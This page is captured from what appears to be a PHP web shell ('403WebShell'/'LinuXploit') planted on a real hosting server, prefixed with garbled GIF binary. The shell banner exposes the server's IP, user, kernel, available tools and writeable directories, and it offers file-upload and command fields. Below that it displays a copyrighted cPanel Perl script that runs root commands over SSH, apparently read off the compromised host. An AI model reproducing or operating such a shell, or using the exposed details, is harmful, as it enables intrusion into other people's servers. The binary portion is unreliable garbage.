GIF89a=( �' 7IAXKgNgYvYx\%wh&h}t�h%�s%x�}9�R��&�0%� (�.��5�SD��&�a)�x5��;ͣ*ȡ&ղ)ׯ7׵<ѻ4�3�H֧KͯT��Y�aq��q��F� !� ' !� NETSCAPE2.0 , =( ��pH,�Ȥr�l:xШtJ�Z�جv��z��xL.:��z�n���|N�����~�������& !�0`9R�}��"�"a:S�~x��������g���E�������R���E����B�� ��ȸ��D���"�Ů� �H��L��D٫D�B�����D���T���H �G��A R�ڐ |�� ٭&��E8�S�kG�A�px�a��� R2XB��E8I���6X�:vT)�~��q�賥��"F~%x� � 4#Z�0O|-4Bs�X:= Q� Sal��yXJ`GȦ|s h��K3l7�B|�$'7Jީܪ0!��D�n=�P� ����0`�R�lj����v>���5 �.69�ϸd�����nlv�9��f{���Pbx �l5}�p� ��� �3a���I�O����!ܾ���i��9��#��)p�a ޽ �{�)vm��%D~ 6f��s}Œ�D�W E�`!� �&L8x� �ܝ{)x`X/>�}m��R�*|`D�=�_ ^�5 !_&'a�O�7�c��`DCx`�¥�9�Y�F���`?��"� �n@`�} lď��@4>�d S �v�xN��"@~d��=�g�s~G��� ���ud &p8Q�)ƫlXD����A~H�ySun�j���k*D�LH�] ��C"J��Xb~ʪwSt}6K,��q�S:9ت:���l�@�`�� �.۬�t9�S�[:��=`9N����{¿�A !R�:���6��x�0�_ �;������^���#����!����U���;0L1�����p% A��U̬ݵ��%�S��!���~`�G���� ���=4�np�3���������u�u�ٮ|%2�I��r�#0��J``8�@S@5� ���^`8E�]�.�S���7 � �0�j S�D� z���i�S�����!���l��w9*�D�I�nEX��� &A�Go�Qf��F��;���}�J����F5��Q|���X��T��y���]� o ��C=��:���PB@ D׽S�(>�C�x}`��xJЬ�۠��p+eE0`�}`A �/NE�� �9@��� H�7�!%B0`�l*��!8 2�%� �:�1�0E��ux%nP1�!�C)�P81l�ɸF#Ƭ{����B0>�� �b�`��O3��()yRpb��E.ZD8�H@% �Rx+%���c� ���f��b�d�`F�"8�XH"��-�|1�6iI, 2�$+](A*j� QT�o0.�U�`�R�}`�SN����yae�����b��o~ S)�y�@��3 �tT�0�&�+~L�f"�-|�~��>!�v��~�\Q1)}@�}h#aP72�"�$ !� " , =( &7IAXG]KgNgYvYxR"k\%w]'}h}t�h%�g+�s%r.m3ax3�x�}9��&��+�!7�0%� (�.�SD��&��;�"&ײ)׻4��6�K� �@pH,�Ȥr�l:xШtJ�Z�جv��z��xL.:��z�n���|N�����~�������& !�0`9R�}��"�"a:S�~x��������g �� E �� �������E �´��C���ǶR��D��"Ʒ�ʱH��M��GڬD�B����D��T����G���C�C� l&�~:'�tU�6ɹ#��)�'�.6�&��Ȼ K(8p0N�?!�2"��NIJX>R��OM '��2�*x�>#n� �@<[:�I�f ��T���Cdb��[�}E�5MBo��@�`@��tW-3 �x�B���jI�&E�9[T&$��ﯧ&"s��ȳ����dc�UUρ#���ldj?����`\}���u|3'�R]�6 �S#�!�FKL�*N E���`$�:e�YD�q�.�촁�s \-�jA 9�����-��M[�x(�s��x�|���p��}k�T�DpE@W� ��]k`1� ���Yb ��0l��*n0��"~zBd�~u�7�0Bl��0-�x~|U�U0 �h�*HS�|��e"#"?vp�i`e6^�+q��`m8 #V�� ��VS|`��"m"сSn|@:U���~`pb�G�ED����2F�I�? >�x� R� ��%~jx��<�a�9ij�2�D��&: Z`�]w���:�6��B�7eFJ|�ҧ�,���FǮcS�ʶ+B�,�ܺN���>PAD�HD��~���n��}�#�� Q��S���2�X�{�k�lQ�2�����w�|2� h9��G�,m���3��6-��E�L��I�³*K���q�`DwV�QXS��peS��� qܧTS����R�u �<�a�*At�lmE� � ��N[P1�ۦ��$��@`��Dpy�yXvCAy�B`}D� 0QwG#� �a[^�� $���Ǧ{L�"[��K�g�;�S~��GX.�goT.��ư��x���?1z��x~:�g�|�L� ��S`��0S]P�^p F<""�?!,�!N4&P� ����:T�@h�9%t��:�-~�I<`�9p I&.)^ 40D#p@�j4�ج:�01��rܼF2oW�#Z ;$Q q  �K��Nl#29 !F@�Bh�ᏬL!XF�LHKh�.�hE&J�G��<"WN!�����Y@� >R~19J"�2,/ &.GXB%�R�9B6�W]���W�I�$��9�RE8Y� ��"�A5�Q.axB�&ة�J�! �t)K%tS-�JF b�NMxL��)�R��"���6O!TH�H� 0 !� ) , =( &AXKgNgYvYxR"k\%wh&h}h%�g+�s%r.x3�x�}9��&��+�R,�!7�0%� (�.��5��&�a)��;�"&ף*Ȳ)ׯ7׻4�3��6�H֧KͻH�T��Y��q��h� ��pH,�Ȥr�l:xШtJ�Z�جv��z��xL.:��z�n���|N�����~�������& !�0`9R�}��"�"a:S�~x��������g �� E$����� � ����$E$��"��D� � ������R��C��� E ��H�M��G�D� �B��ϾD��a��`1r��Ӑ�� �o~�zU!L�C'�yW�UGt����ll�0���uG�)A�s[��x� �xO%��X2�  P�n:R/��aHae+�Dm?# ǣ6�8�J�x�Di�M���j���5oQ7�- <! *�l��R2r/a!l)d� A"�E���� &� ;��c �%����b��pe~C"B���H�eF2��`8qb�t_`ur`e� w�u3��Pv�h""�`�Íx�LĹ��3� �~ֺ�:���MDfJ� �۵�W�%�S�X �؁)�@��:E��w�u�Sxb8y\m�zS��Zb�E�L��w!y(>�"w�=�|��s�d �C�W)H�cC$�L �7r.�\{)@�`@ �X�$PD `aaG:���O�72E�amn]�"Rc�x�R� &dR8`g��i�xLR!�P &d����T���i�|�_ � Qi�#�`g:��:noM� :V �)p����W&a=�e�k� j���1߲s�x�W�jal|0��B0�, \j۴:6���C ��W��|��9���zĸV {�;��n��V�m�I��.��PN� ����C��+��By�ѾHŸ:��� 7�Y�FTk�SaoaY$D�S���29R�kt� ��f� ��:��Sp�3�I��DZ� �9���g��u�*3)O��[_hv ,���Et x�BH� �[��64M@�S�M7d�l�ܶ5-��U܍��z�R3Ԭ3~ ��P��5�g: ���kN�&0�j4���#{��3S�2�K�'ợl���2K{� {۶?~m𸧠�I�nE�='����^���_�=��~�#O���'���o..�Y�n��CSO��a��K��o,���b�����{�C�� "�{�K ��w��Ozdը�:$ ���v�] A#� ���a�z)Rx׿ƥ�d``�w-�y�f�K!����|��P��=�`�(f��'Pa ��BJa%��f�%`�}F����6>��`G"�}�=�!o`�^FP�ةQ�C���`(�}\�ݮ ��$<��n@dĠE#��U�I�!� #l��9`k���'Rr��Z�NB�MF �[�+9���-�wj���8�r� ,V�h"�|�S=�G_��"E� 0i*%̲��da0mVk�):;&6p>�jK ��# �D�:�c?:R Ӭf��I-�"�<�="��7�3S��c2RW ,�8(T"P0F¡Jh�" ; 403WebShell
403Webshell
Server IP : 173.249.157.85  /  Your IP : 18.222.116.64
Web Server : Apache
System : Linux server.frogzhost.com 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64
User : econtech ( 1005)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /scripts/sshcontrol
#!/usr/local/cpanel/3rdparty/bin/perl

# cpanel - scripts/sshcontrol                      Copyright 2022 cPanel, L.L.C.
#                                                           All rights reserved.
# copyright@cpanel.net                                         http://cpanel.net
# This code is subject to the cPanel license. Unauthorized copying is prohibited

#----------------------------------------------------------------------
# This script controls a Net::OpenSSH session.
#
#It can authenticate a connection via password or SSH private key.
#
#It can connect via:
#   1) root login
#   2) user login, then su to root
#   3) user login, then sudo to root
#
#Additionally, existing connections may persist and be reused.
#
#Once connected, it can:
#   1) copy a file from/to local/remote
#   2) AS ROOT: execute an arbitrary command on the remote server
#
#Inputs:
#   key/value are read from STDIN as a hash,
#   serialized with Cpanel::AdminBin::Serializer::Dump()
#
#
#   Required arguments:
#       authuser    The user as which to identify during the SSH login.
#
#       host        The remote host.
#
#       ctl         "ssh" or (usually "scp", but anything defined will do)
#
#
#   Additional, optional arguments:
#       external_master             ctl_pass parameter for Net::OpenSSH
#                                   Required if die_on_pid is not given.
#
#       die_on_pid                  ID of a specific process for the SSH control process
#                                   to watch and self-destruct upon the end of that
#                                   process. Defaults to the script's process ID.
#
#       port                        passed to Net::OpenSSH
#
#       root_pass                   If authuser is "root", used to login;
#                                   otherwise, used to escalate privileges via su.
#                                   (Don’t submit if you mean to do sudo.)
#
#       ssh_private_key_password    passphrase for sshkey
#
#       sshkey                      filename under $HOME/.ssh/
#
#       stay_alive                  boolean; whether to keep the SSH control
#                                   process around and pass back its PID and
#                                   path in the response
#
#       wheel_pass                  Used to login as a non-root user.
#                                   If there is no root_pass, also used to escalate
#                                   privileges via sudo.
#
#
#   Additional arguments when ctl is "ssh":
#       cmd                         if ctl is "ssh", executed AS ROOT on the remote server
#
#
#   Additional arguments when ctl is "scp":
#       destfile                    if ctl ne "ssh", passed to Cpanel::SSHControl::scp
#                                   NOTE: If ".", value is read from the last node in the
#                                   path from srcfile
#
#       direction                   if ctl ne "ssh", passed to Cpanel::SSHControl::scp
#
#       srcfile                     if ctl ne "ssh", passed to Cpanel::SSHControl::scp
#
#
#Output:
#   This speaks the "protocol" that Whostmgr/Remote/Parser.pm understands.
#   Note that this prints even error statuses to STDOUT.
#
#----------------------------------------------------------------------

package Script::SSHControl;

use strict;
use warnings;

use IO::Pipe                     ();
use Cpanel::AdminBin::Serializer ();
use Cpanel::ForkAsync            ();
use Cpanel::SSHControl           ();
use Cpanel::Locale::Lazy 'lh';
use Cpanel::TimeHiRes         ();
use Cpanel::Exception         ();
use Cpanel::Sys::Setsid::Fast ();
use Cpanel::BinCheck::Lite    ();

my $ONEDAY = (86400);

my @REQUIRED_ARGS = qw( authuser host ctl );

Cpanel::BinCheck::Lite::check_argv();

my $debug = 0;
__PACKAGE__->script() unless caller();

sub script {    ## no critic qw(Subroutines::ProhibitExcessComplexity)
    my ($class) = @_;

    local $| = 1;

    local $ENV{'TERM'} = 'dumb';

    my $self = {};
    bless $self, $class;

    my $parsed_args = Cpanel::AdminBin::Serializer::SafeLoadFile( \*STDIN );

    my @missing = grep { !length $parsed_args->{$_} } @REQUIRED_ARGS;
    if (@missing) {
        _leave( lh()->maketext( 'Specify the [list_and_quoted,_1] [numerate,_2,parameter,parameters].', \@missing, ( scalar @missing ) ) );
    }

    my $escalation_method;
    if ( $parsed_args->{'root_escalation_method'} && $parsed_args->{'root_escalation_method'} eq 'none' ) {
        $escalation_method = 'none';
    }
    else {

        # NB: Avoid length() here because we want to interpret
        # root_pass==0 as no root password.
        my $gave_root_pass = !!$parsed_args->{'root_pass'};

        if ( length $parsed_args->{'wheel_pass'} ) {
            if ( $parsed_args->{'authuser'} eq 'root' ) {
                _leave( lh()->maketext( 'If “[_1]” is “[_2]”, you cannot specify “[_3]”.', qw(authuser root wheel_pass) ) );
            }

            # Just a wheel/sudo password? Gotta be sudo.
            if ( !$gave_root_pass ) {
                $escalation_method = 'sudo';
            }
        }

        # Root password + non-root = su
        if ($gave_root_pass) {
            if ( $parsed_args->{'authuser'} ne 'root' ) {
                $escalation_method = 'su';
            }
        }
    }

    my $cmd = $parsed_args->{'cmd'};

    my $ssh_key = $parsed_args->{'sshkey'} ? ( ( getpwuid($>) )[7] . "/.ssh/" . $parsed_args->{sshkey} ) : undef;

    my $ssh_username = $parsed_args->{'authuser'};

    $parsed_args->{'die_on_pid'} ||= $$;

    my $auth_info = {
        'ssh_username'             => $ssh_username,
        'ssh_ip'                   => $parsed_args->{'host'},
        'ssh_port'                 => $parsed_args->{'port'},
        'root_pass'                => $parsed_args->{'root_pass'} || ( $ssh_username eq 'root' ? $parsed_args->{'wheel_pass'} : undef ),
        'wheel_pass'               => $parsed_args->{'wheel_pass'},
        'ssh_private_key_password' => $parsed_args->{'ssh_private_key_password'},
        'root_escalation_method'   => $escalation_method,
        'ssh_private_key'          => $ssh_key,
        'key_or_pass'              => ( $ssh_key ? 1 : 0 ),
    };

    my ( $status, $master_pid, $data );
    my $ssh_obj;

    if ( $parsed_args->{'external_master'} ) {
        $0       = "sshcontrol parent: $auth_info->{'ssh_ip'} - external master";
        $ssh_obj = Net::OpenSSH->new( 'child', external_master => 1, ctl_path => $parsed_args->{'external_master'} );
    }
    else {
        $0 = "sshcontrol parent: $auth_info->{'ssh_ip'} - create connection";
    }

    my $keep_ssh_master = $parsed_args->{'stay_alive'} ? 1 : 0;

    if ( $ssh_obj && $ssh_obj->check_master() ) {
        print "Reused existing connection.\n";
        $0 = "sshcontrol parent: $auth_info->{'ssh_ip'} - reused external master";
    }
    else {
        $0 = "sshcontrol parent: $auth_info->{'ssh_ip'} - creating connection";
        if ( $parsed_args->{'external_master'} ) {
            $keep_ssh_master = 1;
        }
        ( $status, $master_pid, $data ) = $self->_create_ssh_master_connection( $auth_info, $parsed_args->{'die_on_pid'} );
        if ( !$status ) {
            _ssh_error_to_whm_remote_error_and_leave($data);
        }
        $ssh_obj = Net::OpenSSH->new( 'child', external_master => 1, ctl_path => $data );
    }

    if ( $ssh_obj->error() ) {
        my $ssh_error = $ssh_obj->error();
        _ssh_error_to_whm_remote_error_and_leave($ssh_error);
    }

    $0 = "sshcontrol parent: $auth_info->{'ssh_ip'} - attaching to external";
    my $ssh_control = Cpanel::SSHControl->new_from_external( 'debug' => 0, 'quiet' => 0, 'verbose' => 0, 'auth_info' => $auth_info, 'ssh' => $ssh_obj );
    $0 = "sshcontrol parent: $auth_info->{'ssh_ip'} - attached to external";

    $SIG{'TERM'} = sub {
        $ssh_control->disconnect();
    };

    if ( $parsed_args->{ctl} eq 'ssh' ) {
        $0 = "sshcontrol parent: $auth_info->{'ssh_ip'} - ssh";
        my ( $status, $msg ) = $ssh_control->exec_as_root($cmd);

        if ( !$status ) {
            _ssh_error_to_whm_remote_error_and_leave($msg);
        }
    }
    elsif ( $parsed_args->{'ctl'} eq 'scp' ) {
        $0 = "sshcontrol parent: $auth_info->{'ssh_ip'} - scp";
        my $destfile = $parsed_args->{'destfile'} eq '.' ? ( split( m{/+}, $parsed_args->{'srcfile'} ) )[-1] : $parsed_args->{'destfile'};
        my ( $status, $msg ) = $ssh_control->scp(
            'direction' => $parsed_args->{'direction'},
            'srcfile'   => $parsed_args->{'srcfile'},
            'destfile'  => $destfile,
        );

        if ( !$status ) {
            _ssh_error_to_whm_remote_error_and_leave($msg);
        }
        elsif ( $parsed_args->{'direction'} eq 'download' && !-e $destfile ) {
            _ssh_error_to_whm_remote_error_and_leave("The destination file: “$destfile” failed to download.");
        }
    }
    else {
        die "Invalid “ctl”: [$parsed_args->{'ctl'}]";
    }

    $self->_write_sshcontrol_info( $master_pid, $ssh_obj );

    if ( !$keep_ssh_master || !$master_pid ) {
        $ssh_control->disconnect_master();
    }
    undef $ssh_obj;

    return $self;
}

sub _write_sshcontrol_info {
    my ( $self, $master_pid, $ssh_obj ) = @_;

    if ($master_pid) {
        print "\n==sshcontrolpid=$master_pid==\n";
    }

    print "\n==sshcontrolpath=" . $ssh_obj->get_ctl_path() . "==\n";

    return;
}

sub _leave {
    my @args = @_;

    print @args;

    die "\n";
}

sub _create_ssh_master_connection {
    my ( $self, $auth_info, $die_on_pid ) = @_;

    my $ssh_pipe = IO::Pipe->new();
    my $child_result;

    my $sshcontrol_pid = Cpanel::ForkAsync::do_in_child(
        sub {
            $ssh_pipe->writer();
            open( STDOUT, '>&=' . fileno($ssh_pipe) );    ## no critic qw(RequireCheckedOpen)

            if ($die_on_pid) {
                $0 = "sshcontrol child: $auth_info->{'ssh_ip'} - waiting on pid $die_on_pid";
            }
            else {
                $0 = "sshcontrol child: $auth_info->{'ssh_ip'}";
            }

            my $ssh_control = Cpanel::SSHControl->new( 'debug' => 0, 'quiet' => 0, 'verbose' => 0, 'auth_info' => $auth_info );

            {
                local $@;
                eval { $ssh_control->connect() };
                if ($@) {
                    my $error_as_string = Cpanel::Exception::get_string_no_id($@);
                    $error_as_string =~ s/\n/ /g;

                    # This is going to the parent
                    print "\nsshcontrol:0:" . $error_as_string . "\n";
                    exit(1);
                }

            }

            my $master_pid = $ssh_control->{'ssh'}->get_master_pid();

            if ( !$master_pid ) {
                print "\nsshcontrol:0:failed to create sshcontrol master\n";
                exit(1);
            }

            $SIG{'HUP'}  = 'IGNORE';
            $SIG{'ALRM'} = $SIG{'TERM'} = sub {
                $ssh_control->disconnect_master();
                exit(0);
            };

            # This is going to the parent
            print "\nsshcontrol:1:" . $ssh_control->{'ssh'}->get_ctl_path() . "\n";
            Cpanel::Sys::Setsid::Fast::fast_setsid();
            open( STDIN,  '<', '/dev/null' );    ## no critic qw(RequireCheckedOpen)
            open( STDOUT, '>', '/dev/null' );    ## no critic qw(RequireCheckedOpen)
            open( STDERR, '>', '/dev/null' );    ## no critic qw(RequireCheckedOpen)
            alarm($ONEDAY);                      # If something gets killed off expire in one day

            while ( waitpid( $master_pid, 1 ) != -1 && kill( 0, $die_on_pid ) ) {
                Cpanel::TimeHiRes::sleep(0.1);
            }
            $ssh_control->disconnect_master();
            waitpid( $master_pid, 0 );

            exit(0);
        }
    );

    $ssh_pipe->reader();
    while ( readline($ssh_pipe) ) {
        if (m{^sshcontrol:}) { $child_result = $_; last; }
        print;
    }

    chomp($child_result);

    my ( $sshcontrol_tag, $status, $data ) = split( m{:}, $child_result, 3 );

    return ( $status, $sshcontrol_pid, $data );
}

my @SSH_ERRORS;

sub _ssh_error_to_whm_remote_error_and_leave {
    my ($ssh_error) = @_;

    if ( !@SSH_ERRORS ) {
        @SSH_ERRORS = (
            [ qr{master process exited unexpectedly:\s+([^:]+).*?No such file or directory} => 'RemoteSSHMissing' ],
            [ qr{No such file or directory}                                                 => 'RemoteSSHMissing' ],
            [ qr{normalize shell}                                                           => 'RemoteSSHMissing' ],
            [ qr{Name or service not known}                                                 => 'RemoteSSHHostNotFound' ],
            [ qr{Connection timed out}                                                      => 'RemoteSSHTimeout' ],
            [ qr{(scp failed)}                                                              => 'RemoteSCPError' ],
            [ qr{(^scp:.*)}                                                                 => 'RemoteSCPError' ],
            [ qr{(Connection (?:to [^ ]+? )?closed)}                                        => 'RemoteSSHConnectionFailed' ],
            [ qr{(No route to host)}                                                        => 'RemoteSSHConnectionFailed' ],
            [ qr{(Connection refused)}                                                      => 'RemoteSSHConnectionFailed' ],
            [ qr{(lost connection)}                                                         => 'RemoteSSHConnectionFailed' ],
            [ qr{(Failed to escalate to root)}i                                             => 'RemoteSSHRootEscalationFailed' ],
            [ qr{(timeout)}i                                                                => 'RemoteSSHTimeout' ],
            [ qr{master process exited unexpectedly:\s+(.*)}                                => 'RemoteSSHAccessDenied' ],

            #A catch-all, must be last.
            [ qr<> => 'RemoteSSHAccessDenied' ],
        );
    }

    for my $re_code (@SSH_ERRORS) {
        if ( $ssh_error =~ $re_code->[0] ) {
            my $raw_error = $1 || $ssh_error;
            $raw_error =~ s/=//g;
            $raw_error =~ s/\r*\n/ /g;
            _leave("\n==sshcontrol_error=$re_code->[1]=$raw_error==\n");
        }
    }

    # If we did not parse the error, we need to show it
    # but only if we haven't already to avoid showing it twice
    print $ssh_error . "\n";

    #This error is meant to look a bit more "professional" than
    #"Oops! We should never get here!". :)
    die "Misdirected execution flow!";
}

1;

Youez - 2016 - github.com/yon3zu
LinuXploit